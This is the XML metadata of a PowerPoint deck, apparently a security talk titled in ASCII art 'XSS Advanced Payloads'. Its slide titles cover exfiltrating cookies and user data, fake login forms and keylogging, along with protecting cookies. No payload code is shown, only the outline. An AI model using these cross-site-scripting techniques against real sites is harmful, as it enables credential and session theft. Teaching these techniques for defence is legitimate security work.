  <Application>Microsoft Macintosh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     ▒██   ██▒  ██████   ██████                                                         ▒▒ █ █ ▒░▒██    ▒ ▒██    ▒                                                         ░░  █   ░░ ▓██▄   ░ ▓██▄                                                            ░ █ █ ▒   ▒   ██▒  ▒   ██▒                                                        ▒██▒ ▒██▒▒██████▒▒▒██████▒▒                                                        ▒▒ ░ ░▓ ░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░                                                        ░░   ░▒ ░░ ░▒  ░ ░░ ░▒  ░ ░                                                         ░    ░  ░  ░  ░  ░  ░  ░                                                           ░    ░        ░        ░                                                                                                                                ▄▄▄      ▓█████▄  ██▒   █▓ ▄▄▄       ███▄    █  ▄████▄  ▓█████ ▓█████▄     ▒████▄    ▒██▀ ██▌▓██░   █▒▒████▄     ██ ▀█   █ ▒██▀ ▀█  ▓█   ▀ ▒██▀ ██▌    ▒██  ▀█▄  ░██   █▌ ▓██  █▒░▒██  ▀█▄  ▓██  ▀█ ██▒▒▓█    ▄ ▒███   ░██   █▌    ░██▄▄▄▄██ ░▓█▄   ▌  ▒██ █░░░██▄▄▄▄██ ▓██▒  ▐▌██▒▒▓▓▄ ▄██▒▒▓█  ▄ ░▓█▄   ▌     ▓█   ▓██▒░▒████▓    ▒▀█░   ▓█   ▓██▒▒██░   ▓██░▒ ▓███▀ ░░▒████▒░▒████▓      ▒▒   ▓▒█░ ▒▒▓  ▒    ░ ▐░   ▒▒   ▓▒█░░ ▒░   ▒ ▒ ░ ░▒ ▒  ░░░ ▒░ ░ ▒▒▓  ▒       ▒   ▒▒ ░ ░ ▒  ▒    ░ ░░    ▒   ▒▒ ░░ ░░   ░ ▒░  ░  ▒    ░ ░  ░ ░ ▒  ▒       ░   ▒    ░ ░  ░      ░░    ░   ▒      ░   ░ ░ ░           ░    ░ ░  ░           ░  ░   ░          ░        ░  ░         ░ ░ ░         ░  ░   ░                   ░           ░                        ░                ░           ██▓███   ▄▄▄     ▓██   ██▓ ██▓     ▒█████   ▄▄▄      ▓█████▄   ██████      ▓██░  ██▒▒████▄    ▒██  ██▒▓██▒    ▒██▒  ██▒▒████▄    ▒██▀ ██▌▒██    ▒      ▓██░ ██▓▒▒██  ▀█▄   ▒██ ██░▒██░    ▒██░  ██▒▒██  ▀█▄  ░██   █▌░ ▓██▄        ▒██▄█▓▒ ▒░██▄▄▄▄██  ░ ▐██▓░▒██░    ▒██   ██░░██▄▄▄▄██ ░▓█▄   ▌  ▒   ██▒     ▒██▒ ░  ░ ▓█   ▓██▒ ░ ██▒▓░░██████▒░ ████▓▒░ ▓█   ▓██▒░▒████▓ ▒██████▒▒     ▒▓▒░ ░  ░ ▒▒   ▓▒█░  ██▒▒▒ ░ ▒░▓  ░░ ▒░▒░▒░  ▒▒   ▓▒█░ ▒▒▓  ▒ ▒ ▒▓▒ ▒ ░     ░▒ ░       ▒   ▒▒ ░▓██ ░▒░ ░ ░ ▒  ░  ░ ▒ ▒░   ▒   ▒▒ ░ ░ ▒  ▒ ░ ░▒  ░ ░     ░░         ░   ▒   ▒ ▒ ░░    ░ ░   ░ ░ ░ ▒    ░   ▒    ░ ░  ░ ░  ░  ░                      ░  ░░ ░         ░  ░    ░ ░        ░  ░   ░          ░                          ░ ░                                 ░ </vt:lpstr>
      <vt:lpstr>So you have script execution</vt:lpstr>
      <vt:lpstr>Exfiltrating Cookies</vt:lpstr>
      <vt:lpstr>PoC</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Protecting Cookies</vt:lpstr>
      <vt:lpstr>Exfiltrating User Data</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Unintended User Interaction</vt:lpstr>
      <vt:lpstr>Fake Login Forms</vt:lpstr>
      <vt:lpstr>Keylogging</vt:lpstr>
      <vt:lpstr>Other Tricks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▒██   ██▒  ██████   ██████                                                         ▒▒ █ █ ▒░▒██    ▒ ▒██    ▒                                                         ░░  █   ░░ ▓██▄   ░ ▓██▄                                                            ░ █ █ ▒   ▒   ██▒  ▒   ██▒                                                        ▒██▒ ▒██▒▒██████▒▒▒██████▒▒                                                        ▒▒ ░ ░▓ ░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░                                                        ░░   ░▒ ░░ ░▒  ░ ░░ ░▒  ░ ░                                                         ░    ░  ░  ░  ░  ░  ░  ░                                                           ░    ░        ░        ░                                                                                                                                ▄▄▄      ▓█████▄  ██▒   █▓ ▄▄▄       ███▄    █  ▄████▄  ▓█████ ▓█████▄     ▒████▄    ▒██▀ ██▌▓██░   █▒▒████▄     ██ ▀█   █ ▒██▀ ▀█  ▓█   ▀ ▒██▀ ██▌    ▒██  ▀█▄  ░██   █▌ ▓██  █▒░▒██  ▀█▄  ▓██  ▀█ ██▒▒▓█    ▄ ▒███   ░██   █▌    ░██▄▄▄▄██ ░▓█▄   ▌  ▒██ █░░░██▄▄▄▄██ ▓██▒  ▐▌██▒▒▓▓▄ ▄██▒▒▓█  ▄ ░▓█▄   ▌     ▓█   ▓██▒░▒████▓    ▒▀█░   ▓█   ▓██▒▒██░   ▓██░▒ ▓███▀ ░░▒████▒░▒████▓      ▒▒   ▓▒█░ ▒▒▓  ▒    ░ ▐░   ▒▒   ▓▒█░░ ▒░   ▒ ▒ ░ ░▒ ▒  ░░░ ▒░ ░ ▒▒▓  ▒       ▒   ▒▒ ░ ░ ▒  ▒    ░ ░░    ▒   ▒▒ ░░ ░░   ░ ▒░  ░  ▒    ░ ░  ░ ░ ▒  ▒       ░   ▒    ░ ░  ░      ░░    ░   ▒      ░   ░ ░ ░           ░    ░ ░  ░           ░  ░   ░          ░        ░  ░         ░ ░ ░         ░  ░   ░                   ░           ░                        ░                ░           ██▓███   ▄▄▄     ▓██   ██▓ ██▓     ▒█████   ▄▄▄      ▓█████▄   ██████      ▓██░  ██▒▒████▄    ▒██  ██▒▓██▒    ▒██▒  ██▒▒████▄    ▒██▀ ██▌▒██    ▒      ▓██░ ██▓▒▒██  ▀█▄   ▒██ ██░▒██░    ▒██░  ██▒▒██  ▀█▄  ░██   █▌░ ▓██▄        ▒██▄█▓▒ ▒░██▄▄▄▄██  ░ ▐██▓░▒██░    ▒██   ██░░██▄▄▄▄██ ░▓█▄   ▌  ▒   ██▒     ▒██▒ ░  ░ ▓█   ▓██▒ ░ ██▒▓░░██████▒░ ████▓▒░ ▓█   ▓██▒░▒████▓ ▒██████▒▒     ▒▓▒░ ░  ░ ▒▒   ▓▒█░  ██▒▒▒ ░ ▒░▓  ░░ ▒░▒░▒░  ▒▒   ▓▒█░ ▒▒▓  ▒ ▒ ▒▓▒ ▒ ░     ░▒ ░       ▒   ▒▒ ░▓██ ░▒░ ░ ░ ▒  ░  ░ ▒ ▒░   ▒   ▒▒ ░ ░ ▒  ▒ ░ ░▒  ░ ░     ░░         ░   ▒   ▒ ▒ ░░    ░ ░   ░ ░ ░ ▒    ░   ▒    ░ ░  ░ ░  ░  ░                      ░  ░░ ░         ░  ░    ░ ░        ░  ░   ░          ░                          ░ ░                                 ░ </dc:title>
  <dc:creator>_</dc:creator>
  <cp:lastModifiedBy>_</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-04-13T00:18:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-04-14T18:00:37Z</dcterms:modified>
</cp:coreProperties>
</file>